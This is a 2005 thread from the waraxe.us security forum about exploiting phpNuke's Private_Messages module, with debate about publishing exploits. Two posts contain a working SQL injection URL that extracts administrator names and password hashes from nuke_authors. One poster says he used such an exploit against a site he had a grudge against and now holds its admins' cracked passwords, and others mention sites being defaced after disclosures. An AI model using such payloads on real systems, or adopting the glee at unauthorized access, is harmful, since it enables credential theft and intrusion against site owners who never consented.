Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 6, 2023
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 525
Members: 0
Total: 525
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> Just quickly.
Post new topic  Reply to topic View previous topic :: View next topic 
Just quickly.
PostPosted: Mon Apr 04, 2005 12:47 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




I need a quick working exploit like the one in waraxe's advisories for the phpbb part of phpNuke Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Mon Apr 04, 2005 3:52 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




I have made some lame script explotis for phpbb, what do you want exactly?
View user's profile Send private message
PostPosted: Tue Apr 05, 2005 10:45 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




there are tons of exploit are in internet, just type a keyword

btw , what version u need to epxploit

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Apr 05, 2005 11:43 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




I basically just made my first exploit thanks to waraxe.

I used his proof of concept:
Quote:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=
savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20
SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE
%20radminsuper=1%20LIMIT%201/*


And sorted out the nulls.
His one only returns 27 characters of the MD5 and my one well I returns the full MD5. I know that he already knows this but hey I figured it out myself:
Code:
http://localhost/nuke9/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*


Im happy Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Apr 05, 2005 11:59 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
I basically just made my first exploit thanks to waraxe.

I used his proof of concept:
Quote:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=
savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20
SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE
%20radminsuper=1%20LIMIT%201/*


And sorted out the nulls.
His one only returns 27 characters of the MD5 and my one well I returns the full MD5. I know that he already knows this but hey I figured it out myself:
Code:
http://localhost/nuke9/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*


Im happy Razz


Because of this little error im my advisory ( I was rushing too much)many websites were saved from defacement - it needs some work from sploit user Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Apr 05, 2005 12:09 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes it stopped me once and Ill never have that opportunity again Crying or Very sad Laughing

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Apr 05, 2005 12:15 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




But think, how many people have learnt from this faulty proof of concept code Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Apr 05, 2005 12:34 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes I'm sure many learned. Dont do it again.

Na Kidding. Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Apr 05, 2005 12:37 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, i have reveiced some emails about "stop the sploit spread". But my personal opinion is, that only this "shock terapy" will make lazy webmasters and programmers to move their a$$es and learn, how to write secure code Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Apr 05, 2005 12:54 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Exactly my way of thinking.
Plus young people (like me, 17) are the future of IT so this teaches us to right secure code in the future. Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Apr 05, 2005 1:23 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yeah, i agree Very Happy
By the way, i remember, when i was in beginning and have no idea about IT security and insecurity stuff. It was time, when IIS Unicode bug was new thing. And then i saw on www.xakep.ru (russian hacking site) link to vulnerable IIS server. Whoah - first time i got directly to remote server's hard disc Very Happy
This was point of turn on my activity, because i wanted to know much much more and maybe even to write some my own sploits Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Apr 05, 2005 1:52 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Oh thats just what I needed Rolling Eyes (sarcasim) now i got to learn Russian Confused .
My first sploit was this stupid book site. I had a grudge against it. Ive got all the admin's passwords (cracked) they are at my mercy (little do they know it). One thing out of line and there goes 2 years worth or Role Playing. Evil or Very Mad

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 5:38 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:
By the way, i have reveiced some emails about "stop the sploit spread". But my personal opinion is, that only this "shock terapy" will make lazy webmasters and programmers to move their a$$es and learn, how to write secure code Very Happy


i have a message too, after i publishing some hole at becommunity, many korean sites being takeover (deface and else) , ups dont be wrong i have send the vendor some message but no respons.


i think about this alot of time, n i agree with u WARAXE ,
so bugtraq isnt so bad , isnt it ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Apr 06, 2005 5:50 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:
Yeah, i agree Very Happy
By the way, i remember, when i was in beginning and have no idea about IT security and insecurity stuff. It was time, when IIS Unicode bug was new thing. And then i saw on www.xakep.ru (russian hacking site) link to vulnerable IIS server. Whoah - first time i got directly to remote server's hard disc Very Happy
This was point of turn on my activity, because i wanted to know much much more and maybe even to write some my own sploits Smile


ouch,
n now i think many new comer inspired by you , waraxe Smile Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Just quickly.
  www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.159 Seconds